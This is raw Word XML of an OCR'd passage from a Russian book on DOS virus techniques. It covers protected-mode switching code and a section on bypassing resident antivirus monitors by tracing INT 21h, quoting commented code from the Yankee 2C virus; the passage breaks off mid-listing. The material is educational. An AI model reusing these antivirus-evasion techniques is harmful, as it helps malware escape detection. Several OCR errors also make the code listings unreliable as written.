    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Останавливаем в регистр SS селектор сегмента стека</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,SS_DESCR</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ss.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Устанавливаем в регистр DS селектор сегмента данных</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,DS_DESCR</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ds.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.Записываем в строку qw символ "L" и выходим из подпрограммы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov byte ptr ds: [off set qw+2],"L" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">set_protected_mode ENDP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Подпрограмма, возвращающая процессор в реальный режим</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">set_real_mode PROC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Сохраняем значение регистра SP для реального режима</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov real_sp,sp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Выполняем CPU Reset (рестарт процессора)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov al,SHUT_DOWN</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">out STATUS_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Ждем, пока процессор перезапустится</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">wait_reset: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jmp wait_reset </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;C этого места программа выполняется после перезапуска процессора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">shutdown_return: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Устанавливаем регистр DS в соответствии с регистром CS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>push cs</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pop ds </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>восстанавливаем указатели на стек</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;по ранее сохраненным значениям </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ss,real_ss </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov sp,real_sp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Закрываем адресную линию А20</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call disable_a20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Разрешаем немаскируемые прерывания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax.OOOdh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">out CMOS_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Разрешаем маскируемые прерывания </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in al,INT-MASK_PORT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and al,0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out INT_MASK_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sti </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">set_real_mode EN DP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Процедура, открывающая адресную линию А20. После открытия </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[адресной линии программам будет доступна память свыше 1Мбайт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">enable_a20 PROC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al,A20_PORT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out STATUS_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al,A20_ON </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out KBD_PORT_A.al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">enable_a20 ENDP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Процедура, закрывающая адресную линию А20. После закрытия</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[адресной линии программам будет недоступна память свыше 1Мбайт.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[Адресное пространство будет "зацикленным" в пределах 1Мбайт</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">disable_a20 PROC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al.A20_PORT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out STATUS_PORT,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov al,A20_OFF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">out KBD_PORT_A,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">disable_a20 ENDP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Здесь сохраняется адрес стека</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>real_sp dw ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">real_ss dw ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Эта строка выводится на экран после работы программы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[Символ "?" заменяется на "L" в защищенном режиме </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">qw db 13,10,"?ight General",13,10,"$" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Глобальная таблица дескрипторов. Нулевой дескриптор </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">обязательно должен быть "пустым" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GDT_BEG=$ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdtr label WORD </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdt_0 desc_struc &lt;0,0,0,0,0&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdt_gdt desc_struc &lt;GDT_SIZE-1„,DATA_ACC,0&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdt_ds desc_struc &lt;DSEG_SIZE-1,„DATA_ACC,0&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdt_cs desc_struc &lt;CSEG_SIZE-1„,CODE_ACC,0&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gdt_ss desc_struc &lt;STACK_SIZE-1,„DATA_ACC,0&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GDT_SIZE=($-GDT_BEG) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">END start </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Обход резидентных антивирусных мониторов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обычно все программы используют сервис DOS так: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ah,...</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>По команде INT управление передается в точку, адрес которой определя-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ется двумя словами, находящимися в таблице векторов прерываний</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>по адресу 0000h:0084h. С этого момента начинается исполнение команд</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>многочисленных обработчиков прерывания INT 21h и не менее многочис-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ленных резидентных программ до тех пор, пока управление, наконец,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">не получит оригинальный обработчик операционной системы (рис. 5.1.): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:pStyle w:val="a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14pt;height:69pt">
            <v:imagedata r:id="rId4" o:title="51"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="009C190D">
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Разумеется, среди этих многочисленных обработчиков может "затесаться"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>обработчик, принадлежащий антивирусному монитору, который не дает</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">спокойно работать не только вирусам, но и обычным программам. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Поэтому серьезные вирусы и некоторые хорошо написанные программы</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>пытаются определить адрес оригинального обработчика и обратиться</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">к нему напрямую, в обход остальных обработчиков: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ah,...</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">pushf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call dword ptr 021 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">021 dw ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">S21 dw ? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Но антивирусные мониторы учитывают эту возможность и принимают</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">свои меры. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Определение адреса оригинального обработчика DOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Для того чтобы обратиться к DOS напрямую, нужно знать адрес ориги-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">нального обработчика. Получить этот адрес не так просто. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Метод трассировки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Чаще всего используется метод трассировки при помощи отладочного</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>прерывания INT 1. Суть метода заключается в том, что вирус трассиру-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ет прерывание INT 21h (включает флаг трассировки, при этом после</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>каждой команды происходит прерывание INT 1) и проверяет значение</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>сегмента, в котором идет обработка прерывания. Если значение сегмен-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>та меньше ОЗООЬ, то это обработчик DOS. Например, так поступал мно-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>го лет назад вирус Yankee 2C (М2С, Музыкальный). Вот листинг соот-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ветствующего фрагмента с комментариями: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Берем из таблицы векторов прерываний текущий адрес INT 01 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,3501 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov si.bx ;смещение сохраняем в регистре SI</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov di.es ;сегмент сохраняем в регистре DI </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Останавливаем свой обработчик INT 01h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,2501h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov dx,offset lnt01</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Формируем в стеке адрес выхода из трассировки так, чтобы по IRET</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;из INT 21h попасть на метку Next - помещаем в стек</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.последовательно флаги, сегмент и смещение метки Next </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pushf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push cs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,offset Next </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Начинаем трассировку INT 21 h. Для этого нужно подготовить стек</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;следующим образом: поместить в него флаги с включенным флагом</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;трассировки, а также сегмент и смещение текущего обработчика</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;INT 21 h. Затем можно выполнить команду IRET - программа запустит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.текущий обработчик и считает из стека флаги (флаг трассировки</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;во флаговом регистре включится, начнется трассировка. После</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.каждой команды процессора будет запускаться INT 01 h).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Помещаем в стек флаги, включаем в них бит, соответствующий</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;флагу трассировки TF. Для того, чтобы включить флаг</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.трассировки TF, после сохранения флагов в стеке считаем их</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;в регистр АХ, в нем включим соответствующий бит, а затем</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.сохраним регистр АХ в стеке </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pushf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">or ax,0100h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Считаем из таблицы векторов прерываний текущий адрес INT 21 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov ax,3521 h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 21 h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
